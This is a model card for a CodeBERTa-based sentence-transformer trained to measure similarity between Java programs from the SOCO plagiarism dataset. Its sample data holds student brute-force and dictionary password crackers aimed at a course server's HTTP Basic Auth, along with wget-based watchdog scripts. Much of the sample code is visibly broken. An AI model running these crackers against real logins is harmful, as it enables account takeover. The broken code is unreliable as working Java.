\ strLine;\n int intWordLength;\n\n int intCountOfOneLetterWords =\
\ -1;\n int intCountOfTwoLetterWords = -1;\n int intCountOfThreeLetterWords\
\ = -1;\n\n\n\n try\n { \n \n \n \n \
\ \n \n reader = new FileReader(TextFileName);\n\n \
\ \n \n \n \n inTextFile = new\
\ BufferedReader(reader);\n\n\n strLine = inTextFile.readLine();\n\n\n\
\ while (strLine != null)\n {\n\n strLine = strLine.trim();\n\
\ intWordLength = strLine.length();\n\n\n \n \
\ \n if (intWordLength == 1)\n {\n intCountOfOneLetterWords++;\n\
\ strOneLetterWords[intCountOfOneLetterWords] = strLine;\n \
\ }\n\n \n \n else if (intWordLength\
\ == 2) \n {\n\n intCountOfTwoLetterWords++;\n \
\ strTwoLetterWords[intCountOfTwoLetterWords] = strLine;\n \
\ }\n\n \n \n else if (intWordLength ==\
\ 3)\n {\n intCountOfThreeLetterWords++;\n \
\ strThreeLetterWords[intCountOfThreeLetterWords] = strLine;\n \
\ }\n\n strLine = inTextFile.readLine();\n\n }\n\n }\n\
\n catch(FileNotFoundException e)\n {\n\n \n \n\
\ System.out.println();\n System.out.println(\"The file '\" +\
\ TextFileName + \"' cannot found.\");\n System.out.println();\n\n \
\ }\n\n catch(Exception e)\n {\n System.out.println(\"Exception\
\ thrown....\");\n System.err.println(e);\n }\n\n finally\n\
\ {\n\n try\n {\n inTextFile.print();\n \
\ }\n catch(Exception e)\n {\n }\n\n inTextFile\
\ = null;\n reader = null;\n\n }\n\n }\n\n\n\n\n\n\n\n static\
\ boolean passwordWasFound(String urlString,\n \
\ String password,\n boolean retVal)\n \
\ \n {\n\n String strEncodeInput = username + \":\" + password;\n \
\ boolean returnValue = retVal;\n boolean boolExceptionThrown = false;\n\n\
\n\n try\n {\n\n strLastPasswordTested = password;\n \n \
\ intNumberOfConnectionAttempts++;\n\n url = new URL(urlString);\n\
\n String encoding = new url.misc.BASE64Encoder().encode (strEncodeInput.getBytes());\n\
\n\n System.out.print(\"username = \" + \n username\
\ + \n \" \" +\n \
\ \"password = \" +\n password);\n\n\n\n HttpURLConnection\
\ urlConnection = (HttpURLConnection)url.openConnection();\n\n urlConnection.setRequestProperty(\"\
Authorization\", \n \" \" + encoding);\
\ \n\n System.out.println(\" response = \" + urlConnection.getResponseCode());\n\
\n if (urlConnection.getResponseCode() == 401)\n {\n \
\ returnValue = false; \n }\n\n }\n\n catch (MalformedURLException\
\ m)\n {\n boolExceptionThrown = true;\n returnValue = false;\n\
\n System.err.println(m);\n System.out.println(\"Malformed URL\
\ Exception error\");\n }\n\n catch (IOException io)\n {\n \
\ boolExceptionThrown = true;\n returnValue = false;\n\n System.out.println(\"\
IOException error\");\n System.err.println(io); \n }\n\n catch\
\ (Exception e)\n {\n boolExceptionThrown = true;\n returnValue\
\ = false;\n\n System.out.println(\"General exception.....\");\n \
\ System.err.println(e); \n }\n\n finally\n { \n urlConnection\
\ = null;\n url = null; \n }\n\n\n if (boolExceptionThrown)\n\
\ {\n intExceptionCount++;\n strExceptionPassword[intExceptionCount]\
\ = password;\n }\n\n\n return returnValue;\n\n }\n\n}"
- "import java.util.*;\nimport java.io.*;\nimport javax.swing.text.html.*;\n\n\n\
public class WatchDog {\n\n public WatchDog() {\n\n }\n public static void\
\ main (String args[]) {\n DataInputStream newin;\n\n try{\n System.out.println(\"\
ishti\");\n\n System.out.println(\"Downloading first copy\");\n Runtime.getRuntime().exec(\"\
wget http://www.cs.rmit.edu./students/ -O oldfile.html\");\n String[] cmdDiff\
\ = {\"//sh\", \"-c\", \"diff oldfile.html newfile.html > Diff.txt\"};\n \
\ String[] cmdMail = {\"//sh\", \"-c\", \"mailx -s \\\"Diffrence\\\" \\\"@cs.rmit.edu.\\\
\" < Diff.txt\"};\n while(true){\n Thread.sleep(24*60*60*1000);\n\
\ System.out.println(\"Downloading new copy\");\n Runtime.getRuntime().exec(\"\
wget http://www.cs.rmit.edu./students/ -O newfile.html\");\n Thread.sleep(2000);\n\
\ Runtime.getRuntime().exec(cmdDiff);\n Thread.sleep(2000);\n\
\ newin = new DataInputStream( new FileInputStream( \"Diff.txt\"));\n\
\ if (newin.readLine() != null){\n System.out.println(\"\
Sending Mail\");\n Runtime.getRuntime().exec(cmdMail);\n \
\ Runtime.getRuntime().exec(\"cp newfile.html oldfile.html\");\n\n \
\ }\n }\n\n }\n catch(Exception e){\n e.printStackTrace();\n\
\ }\n\n }\n\n}"
datasets:
- buelfhood/SOCO_TRAIN_java
pipeline_tag: sentence-similarity
library_name: sentence-transformers
---
# SentenceTransformer based on huggingface/CodeBERTa-small-v1
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1) on the [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java) dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1) <!-- at revision e93b5898cff07f03f1c1c09cde284d1b85962363 -->
- **Maximum Sequence Length:** 512 tokens
- **Output Dimensionality:** 768 dimensions
- **Similarity Function:** Cosine Similarity
- **Training Dataset:**
- [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java)
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False, 'architecture': 'RobertaModel'})
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
```
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-codeberta-cmnrl-triplets-ep1-bs16-lr2e-05-split0.1")
# Run inference
sentences = [
'import java.net.*;\nimport java.io.*;\n\npublic class BruteForce {\n private String strUserName;\n private String strURL;\n private int iAttempts;\n \n public BruteForce(String strURL,String strUserName) {\n this.strURL = strURL;\n this.strUserName = strUserName;\n this.iAttempts = 0 ;\n\n }\n \n public String getPassword(){\n URL u;\n String result ="";\n PassGenBrute PG = new PassGenBrute(3);\n URLConnection uc;\n String strPassword = new String();\n String strEncode;\n try{\n while (result.compareTo("HTTP/1.1 200 OK")!=0){\n \n strEncode = PG.getNewPassword();\n u = new URL(strURL);\n uc = u.openConnection();\n uc.setDoInput(true);\n uc.setDoOutput(true);\n strPassword = strEncode;\n strEncode = strUserName + ":" + strEncode;\n \n strEncode = new String(Base64.encode(strEncode.getBytes()));\n uc.setRequestProperty("Authorization"," " + strEncode);\n \n result = uc.getHeaderField(0);\n uc = null;\n u = null;\n iAttempts++;\n }\n\n }\n catch (Exception me) {\n System.out.println("MalformedURLException: "+me);\n }\n return(strPassword);\n }\n \n public int getAttempts(){\n return (iAttempts);\n };\n \n public static void main (String arg[]){\n timeStart = 0;\n timeEnd = 0;\n \n if (arg.length == 2) {\n BruteForce BF = new BruteForce(arg[0],arg[1]);\n System.out.println("Processing ... ");\n timeStart = System.currentTimeMillis();\n \n System.out.println("Password = " + BF.getPassword());\n timeEnd = System.currentTimeMillis();\n System.out.println("Total Time Taken = " + (timeEnd - timeStart) + " (msec)");\n System.out.println("Total Attempts = " + BF.getAttempts());\n }\n else {\n System.out.println("[Usage] java BruteForce <URL> <USERNAME>");\n\n }\n\n }\n}\n\nclass PassGenBrute {\n private char[] password;\n public PassGenBrute(int lenght) {\n password = new char[lenght];\n for (int i = 0; i < lenght; i++){\n password[i] = 65;\n }\n password[0]--;\n }\n \n public String getNewPassword()\n throws PasswordFailureException{\n password[0]++;\n\n try {\n for (int i=0; i<password.length ; i++){\n if (password[i] == 90) {\n password[i] = 97;\n }\n if (password[i] > 122) {\n password[i] = 65;\n password[i+1]++;\n }\n }\n }\n catch (RuntimeException re){\n throw new PasswordFailureException ();\n }\n return new String(password);\n }\n}\n\nclass PasswordFailureException extends RuntimeException {\n\n public PasswordFailureException() {\n }\n}',
'import java.net.*;\nimport java.io.*;\n\n\npublic class Dictionary {\n private String strUserName;\n private String strURL;\n private String strDictPath;\n private int iAttempts;\n\n \n public Dictionary(String strURL,String strUserName,String strDictPath) {\n this.strURL = strURL;\n this.strUserName = strUserName;\n this.iAttempts = 0 ;\n this.strDictPath = strDictPath;\n }\n \n\n public String getPassword(){\n URL u;\n String result ="";\n PassGenDict PG = new PassGenDict(3,strDictPath);\n URLConnection uc;\n String strPassword = new String();\n String strEncode;\n try{\n while (result.compareTo("HTTP/1.1 200 OK")!=0){\n \n strEncode = PG.getNewPassword();\n u = new URL(strURL);\n uc = u.openConnection();\n uc.setDoInput(true);\n uc.setDoOutput(true);\n strPassword = strEncode;\n strEncode = strUserName + ":" + strEncode;\n \n strEncode = new String(Base64.encode(strEncode.getBytes()));\n uc.setRequestProperty("Authorization"," " + strEncode);\n \n result = uc.getHeaderField(0);\n uc = null;\n u = null;\n iAttempts++;\n }\n\n }\n catch (Exception me) {\n System.out.println("MalformedURLException: "+me);\n }\n return(strPassword);\n }\n \n public int getAttempts(){\n return (iAttempts);\n };\n \n public static void main(String arg[]){\n timeStart = 0;\n timeEnd = 0;\n \n if (arg.length == 3) {\n Dictionary BF = new Dictionary(arg[0],arg[1],arg[2]);\n\n System.out.println("Processing ... ");\n timeStart = System.currentTimeMillis();\n System.out.println("Password = " + BF.getPassword());\n timeEnd = System.currentTimeMillis();\n System.out.println("Total Time Taken = " + (timeEnd - timeStart) + " (msec)");\n System.out.println("Total Attempts = " + BF.getAttempts());\n }\n else {\n System.out.println("[Usage] java BruteForce <URL> <USERNAME> <Dictionary path>");\n\n }\n\n }\n}\n\n\nclass PassGenDict {\n\n private char[] password;\n private String line;\n int iPassLenght;\n private BufferedReader inputFile;\n public PassGenDict(int lenght, String strDictPath) {\n try{\n inputFile = new BufferedReader(new FileReader(strDictPath));\n }\n catch (Exception e){\n }\n iPassLenght = lenght;\n }\n \n public String getNewPassword()\n throws PasswordFailureException{\n try {\n {\n line = inputFile.readLine();\n }while (line.length() != iPassLenght);\n\n }\n catch (Exception e){\n throw new PasswordFailureException ();\n }\n return (line);\n }\n}\n\nclass PasswordFailureException extends RuntimeException {\n\n public PasswordFailureException() {\n }\n}',
'import java.util.*;\nimport java.io.*;\nimport javax.swing.text.html.*;\n\n\npublic class WatchDog {\n\n public WatchDog() {\n\n }\n public static void main (String args[]) {\n DataInputStream newin;\n\n try{\n System.out.println("ishti");\n\n System.out.println("Downloading first copy");\n Runtime.getRuntime().exec("wget http://www.cs.rmit.edu./students/ -O oldfile.html");\n String[] cmdDiff = {"//sh", "-c", "diff oldfile.html newfile.html > Diff.txt"};\n String[] cmdMail = {"//sh", "-c", "mailx -s \\"Diffrence\\" \\"@cs.rmit.edu.\\" < Diff.txt"};\n while(true){\n Thread.sleep(24*60*60*1000);\n System.out.println("Downloading new copy");\n Runtime.getRuntime().exec("wget http://www.cs.rmit.edu./students/ -O newfile.html");\n Thread.sleep(2000);\n Runtime.getRuntime().exec(cmdDiff);\n Thread.sleep(2000);\n newin = new DataInputStream( new FileInputStream( "Diff.txt"));\n if (newin.readLine() != null){\n System.out.println("Sending Mail");\n Runtime.getRuntime().exec(cmdMail);\n Runtime.getRuntime().exec("cp newfile.html oldfile.html");\n\n }\n }\n\n }\n catch(Exception e){\n e.printStackTrace();\n }\n\n }\n\n}',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities)
# tensor([[ 1.0000, 0.9429, -0.0890],
# [ 0.9429, 1.0000, -0.0692],
# [-0.0890, -0.0692, 1.0000]])
```
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Dataset
#### soco_train_java
* Dataset: [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java) at [44ca4ff](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java/tree/44ca4ff546c090153d7903c15aeda036891ec476)
* Size: 38,664 training samples
* Columns: <code>anchor_code</code>, <code>positive_code</code>, and <code>negative_code</code>
* Approximate statistics based on the first 1000 samples:
| | anchor_code | positive_code | negative_code |
|:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string | string |
| details | <ul><li>min: 51 tokens</li><li>mean: 466.15 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 467.06 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 454.38 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| anchor_code | positive_code | negative_code |
|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code><br><br>import java.io.*;<br>import java.net.*;<br>import java.misc.BASE64Encoder;<br><br>public class Dictionary<br>{<br> public Dictionary()<br> {}<br><br> public boolean fetchURL(String urlString,String username,String password)<br> {<br> StringWriter sw= new StringWriter();<br> PrintWriter pw = new PrintWriter();<br> try{<br> URL url=new URL(urlString); <br> String userPwd= username+":"+password;<br><br> <br> <br> <br> <br><br> BASE64Encoder encoder = new BASE64Encoder();<br> String encodedStr = encoder.encode (userPwd.getBytes());<br> System.out.println("Original String = " + userPwd);<br> System.out.println("Encoded String = " + encodedStr);<br><br> HttpURLConnection huc=(HttpURLConnection) url.openConnection(); <br> huc.setRequestProperty( "Authorization"," "+encodedStr); <br> InputStream content = (InputStream)huc.getInputStream();<br> BufferedReader in =<br> new BufferedReader (new InputStreamReader (content));<br> String line;<br> while ((line = in.readLine())...</code> | <code><br><br>import java.io.*;<br>import java.net.*;<br>import java.misc.BASE64Encoder;<br><br>public class BruteForce<br>{<br> public BruteForce()<br> {}<br><br> public boolean fetchURL(String urlString,String username,String password)<br> {<br> StringWriter = new StringWriter();<br> PrintWriter pw = new PrintWriter();<br> try{<br> URL url=new URL(urlString); <br> String userPwd= username+":"+password;<br><br> <br> <br> <br> <br><br> BASE64Encoder encoder = new BASE64Encoder();<br> String encodedStr = encoder.encode (userPwd.getBytes());<br> System.out.println("Original String = " + userPwd);<br> System.out.println("Encoded String = " + encodedStr);<br><br> HttpURLConnection huc=(HttpURLConnection) url.openConnection(); <br> huc.setRequestProperty( "Authorization"," "+encodedStr); <br> InputStream content = (InputStream)huc.getInputStream();<br> BufferedReader in = <br> new BufferedReader (new InputStreamReader (content));<br> String line;<br> while ((line = in.readLine()) ...</code> | <code><br><br>import java.net.*;<br>import java.io.*;<br>import java.util.*;<br><br>public class Dictionary{<br><br> private static URL location;<br> private static String user;<br> private BufferedReader input;<br> private static BufferedReader dictionary;<br> private int maxLetters = 3;<br><br> <br><br> public Dictionary() {<br> <br> Authenticator.setDefault(new MyAuthenticator ());<br><br> startTime = System.currentTimeMillis();<br> boolean passwordMatched = false;<br> while (!passwordMatched) {<br> try {<br> input = new BufferedReader(new InputStreamReader(location.openStream()));<br> String line = input.readLine();<br> while (line != null) {<br> System.out.println(line);<br> line = input.readLine();<br> }<br> input.close();<br> passwordMatched = true;<br> }<br> catch (ProtocolException e)<br> {<br> <br> <br> }<br> catch (ConnectException e) {<br> System.out.println("Failed connect");<br> }<br> catch (IOException e) ...</code> |
| <code><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br><br>public class WatchdogPropertyHelper {<br><br> private static Properties testProps;<br><br><br><br> public WatchdogPropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the watchddog Props");<br> e.printStackTrace();<br> }<br> return testProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(testProps == null){<br> testProps = new Properties();<br><br> InputStream fis =<br> WatchdogPropertyHelper.class.getResourceAsStream("/watchdog.properties");<br> testProps.load(fis);<br> }<br> }<br>}<br></code> | <code><br><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br>public class BruteForcePropertyHelper {<br><br> private static Properties bruteForceProps;<br><br><br><br> public BruteForcePropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the burteforce Props");<br> e.printStackTrace();<br> }<br> return bruteForceProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(bruteForceProps == null){<br> bruteForceProps = new Properties();<br><br> InputStream fis =<br> BruteForcePropertyHelper.class.getResourceAsStream("/bruteforce.properties");<br> bruteForceProps.load(fis);<br> }<br> }<br>}<br><br></code> | <code><br><br><br><br><br><br><br><br>import java.io.*;<br>import java.net.*;<br>import javax.swing.Timer;<br>import java.awt.event.*;<br>import javax.swing.JOptionPane;<br><br>public class WatchDog <br>{<br> private static Process pro = null;<br> private static Runtime run = Runtime.getRuntime();<br> <br> public static void main(String[] args) <br> {<br> String cmd = null;<br> try<br> {<br> cmd = new String("wget -O original.txt http://www.cs.rmit.edu./students/");<br><br> pro = run.exec(cmd);<br> System.out.println(cmd);<br> }<br> catch (IOException e)<br> {<br> }<br> <br> class Watch implements ActionListener<br> {<br> BufferedReader in = null;<br> String str = null;<br> Socket socket;<br> public void actionPerformed (ActionEvent event)<br> {<br> <br> try<br> {<br> System.out.println("in Watch!");<br> String cmd = new String();<br> int ERROR = 1;<br> cmd = new String("wget -O new.txt http://www.cs.rmit.edu./students/");<br><br><br> System.out.println(cmd);<br> cmd = new String("diff original.txt new.txt");<br> pro = run.exec(cmd);<br> System.out.println(cmd);<br> in = new Buf...</code> |
| <code><br>import java.net.*; <br>import java.io.*; <br>public class BruteForce {<br>private static String password=" "; <br><br> <br> public static void main(String[] args) {<br> String Result=""; <br> if (args.length<1)<br> {<br> System.out.println("Error: Correct Format Filename, username e.g<>"); <br> System.exit(1); <br> }<br> BruteForce bruteForce1 = new BruteForce();<br> Result=bruteForce1.Password("http://sec-crack.cs.rmit.edu./SEC/2/",args[0]); <br> System.out.println("The Password of "+args[0]+"is.."+Result); <br> <br> }<br><br><br><br> private String Password(String urlString,String username) <br> { <br> int cnt=0;<br> <br> t0 = System.currentTimeMillis(); <br> for ( char ch = 'A'; ch <= 'z'; ch++ )<br> { <br> if (ch>'Z' && ch<'a')<br> { <br> ch='a'; <br> } <br> <br> for ( char ch1 = 'A'; ch1 <= 'z'; ch1++ )<br> { <br> <br> if (ch1>'Z' && ch1<'a')<br> { <br> ch1='a'; <br> }<br><br><br> for ( char ch2 = 'A'; ch2 <= 'z'; ch2++ )<br> { <br> if (ch2>'Z' && ch2<'a')<br> { <br> ...</code> | <code><br><br>import java.net.*; <br>import java.io.*; <br>import java.util.Date; <br>public class Dictionary{<br>private static String password=" "; <br><br> <br> public static void main(String[] args) {<br> String Result=""; <br> if (args.length<1)<br> {<br> System.out.println("Correct Format Filename username e.g<>"); <br> System.exit(1); <br> }<br> <br> Dictionary dicton1 = new Dictionary();<br> Result=dicton1.Dict("http://sec-crack.cs.rmit.edu./SEC/2/",args[0]); <br> System.out.println("Cracked Password for The User "+args[0]+" The Password is.."+Result); <br> <br><br> <br> <br> }<br><br><br><br> private String Dict(String urlString,String username) <br> { <br> int cnt=0;<br> FileInputStream stream=null;<br> DataInputStream word=null;<br><br> try{ <br> stream = new FileInputStream ("/usr/share/lib/dict/words"); <br><br> word =new DataInputStream(stream);<br> t0 = System.currentTimeMillis(); <br> while (word.available() !=0) <br> {<br> <br> password=word.readLine();<br> if (password.length()!=3)<br> {<br> continue;<br> }<br> System.out.print("...</code> | <code><br>package java.httputils;<br><br>import java.io.IOException;<br>import java.net.MalformedURLException;<br>import java.util.ArrayList;<br>import java.util.Iterator;<br><br><br>public class RunnableHttpRequest extends Thread<br>{<br> protected String targetURL = "http://localhost:8080/";<br> protected int requestCount = 1;<br> protected ArrayList timingList = new ArrayList();<br> protected HttpRequestClient req;<br> Boolean finished = new Boolean(false);<br> HttpRequestThreadPool pool;<br><br> <br> public void run()<br> {<br> try<br> {<br> for (int i = 0; i < getRequestCount() && !getFinished().booleanValue(); i++)<br> {<br> try<br> {<br> req =<br> new HttpRequestClient(getTargetURL());<br><br> <br> }<br> catch (MalformedURLException e)<br> {<br> e.printStackTrace();<br> break;<br> }<br> catch (IOException e)<br> {<br> ...</code> |
* Loss: [<code>CachedMultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cachedmultiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"mini_batch_size": 32,
"gather_across_devices": false
}
```
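For orientation, a minimal sketch of instantiating this loss in Sentence Transformers is shown below; the checkpoint and variable names are illustrative assumptions rather than the original training script.
```python
from sentence_transformers import SentenceTransformer
from sentence_transformers.losses import CachedMultipleNegativesRankingLoss

# Assumption: start from the same base checkpoint named above.
model = SentenceTransformer("huggingface/CodeBERTa-small-v1")

# Cached MNRL uses the other in-batch positives as negatives while chunking the
# forward pass into mini-batches of 32 to bound GPU memory; scale=20.0 matches the parameters above.
loss = CachedMultipleNegativesRankingLoss(model, scale=20.0, mini_batch_size=32)
```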
### Evaluation Dataset
#### soco_train_java
* Dataset: [soco_train_java](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java) at [44ca4ff](https://huggingface.co/datasets/buelfhood/SOCO_TRAIN_java/tree/44ca4ff546c090153d7903c15aeda036891ec476)
* Size: 4,296 evaluation samples
* Columns: <code>anchor_code</code>, <code>positive_code</code>, and <code>negative_code</code>
* Approximate statistics based on the first 1000 samples:
| | anchor_code | positive_code | negative_code |
|:--------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | string | string | string |
| details | <ul><li>min: 51 tokens</li><li>mean: 465.22 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 464.66 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 458.05 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| anchor_code | positive_code | negative_code |
|:----------|:----------|:----------|
| <code><br><br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class WatchDog<br>{ <br><br> public static void main(String args[])<br> {<br><br> Runtime rt1 = Runtime.getRuntime();<br> Process prss1= null;<br><br> try<br> {<br> prss1 = rt1.exec("wget -R mpg,mpeg, --output-document=first.html http://www.cs.rmit.edu./students/");<br> }catch(java.io.IOException e){}<br><br> MyWatchDogTimer w = new MyWatchDogTimer();<br> Timer time = new Timer();<br> time.schedule(w,864000000,864000000);<br><br> <br> }<br>}<br></code> | <code> <br><br><br><br><br>import java.util.*;<br>import java.io.*;<br><br>public class MyTimer<br>{ <br><br> public static void main(String args[])<br> {<br> Watchdog watch = new Watchdog();<br> Timer time = new Timer();<br> time.schedule(watch,864000000,864000000);<br> <br> <br> }<br>}<br></code> | <code>import java.net.*; <br>import java.io.*; <br>import java.util.Vector;<br>import java.util.Date;<br>import java.security.*;<br><br><br><br><br><br><br><br><br><br><br><br> <br>public class Dictionary { <br> public static BufferedReader in;<br> <br> <br> public static void main(String[] args) throws Exception { <br> String baseURL = "http://sec-crack.cs.rmit.edu./SEC/2/index.php"; <br> int count=0;<br> Date date = new Date();<br> startTime=date.getTime();<br> int LIMITINMINUTES=45;<br> int TIMELIMIT=LIMITINMINUTES*1000*60;<br> boolean timedOut=false;<br> boolean found=false;<br> <br> <br> Vector dictionary=new Vector(readWords());<br> System.out.println("Words in dictionary: "+dictionary.size());<br> <br> <br> <br> <br> <br> <br> <br> while (found==false && timedOut==false && dictionary.elementAt(count)!=null) {<br> <br> Date endDate = new Date();<br> endTime=endDate.getTime(); <br> if (endTime>(TIMELIMIT+startTime)){<br> System.out.println("Timed out");<br> timedOut=true;<br> }<br> <br> String password = "";<br><br> ...</code> |
| <code><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br><br><br>public class MailsendPropertyHelper {<br><br> private static Properties testProps;<br><br> public MailsendPropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the watchddog Props");<br> e.printStackTrace();<br> }<br> return testProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(testProps == null){<br> testProps = new Properties();<br><br> InputStream fis =<br> MailsendPropertyHelper.class.getResourceAsStream("/mailsend.properties");<br> testProps.load(fis);<br> }<br> }<br>}<br><br><br><br><br><br></code> | <code><br><br><br><br>import java.io.InputStream;<br>import java.util.Properties;<br><br>import javax.naming.Context;<br>import javax.naming.InitialContext;<br>import javax.rmi.PortableRemoteObject;<br>import javax.sql.DataSource;<br><br><br><br><br>public class BruteForcePropertyHelper {<br><br> private static Properties bruteForceProps;<br><br><br><br> public BruteForcePropertyHelper() {<br> }<br><br><br> <br><br> public static String getProperty(String pKey){<br> try{<br> initProps();<br> }<br> catch(Exception e){<br> System.err.println("Error init'ing the burteforce Props");<br> e.printStackTrace();<br> }<br> return bruteForceProps.getProperty(pKey);<br> }<br><br><br> private static void initProps() throws Exception{<br> if(bruteForceProps == null){<br> bruteForceProps = new Properties();<br><br> InputStream fis =<br> BruteForcePropertyHelper.class.getResourceAsStream("/bruteforce.properties");<br> bruteForceProps.load(fis);<br> }<br> }<br>}<br><br></code> | <code><br>import java.net.*;<br>import java.io.*;<br>import java.Ostermiller.util.*;<br>import java.util.*;<br><br>public class MyClient2 implements Runnable<br>{<br> private String hostname;<br> private int port;<br> private String filename;<br> private Socket s;<br> private int n;<br> private InputStream sin;<br> private OutputStream sout;<br> private int dif;<br> private String myPassword;<br> private int status;<br> private int myTime;<br> private BruteForce myMaster;<br> <br><br> public MyClient2(BruteForce bf , int num, int myPort, String password)<br> {<br> <br> hostname = new String("sec-crack.cs.rmit.edu.");<br> port = myPort;<br> status = 0;<br> myTime = 0;<br> myPassword = password;<br> filename = new String("/SEC/2/");<br> myMaster = 0;<br> n = num;<br> dif = 0;<br> <br> }<br> public getDif()<br> {<br> return dif;<br> }<br> public int getStatus()<br> {<br> return status;<br> }<br> public void run() <br> {<br> String inputLine;<br> String[] tokens = new String[5];<br> int i;<br> myTime = 0;<br> ...</code> |
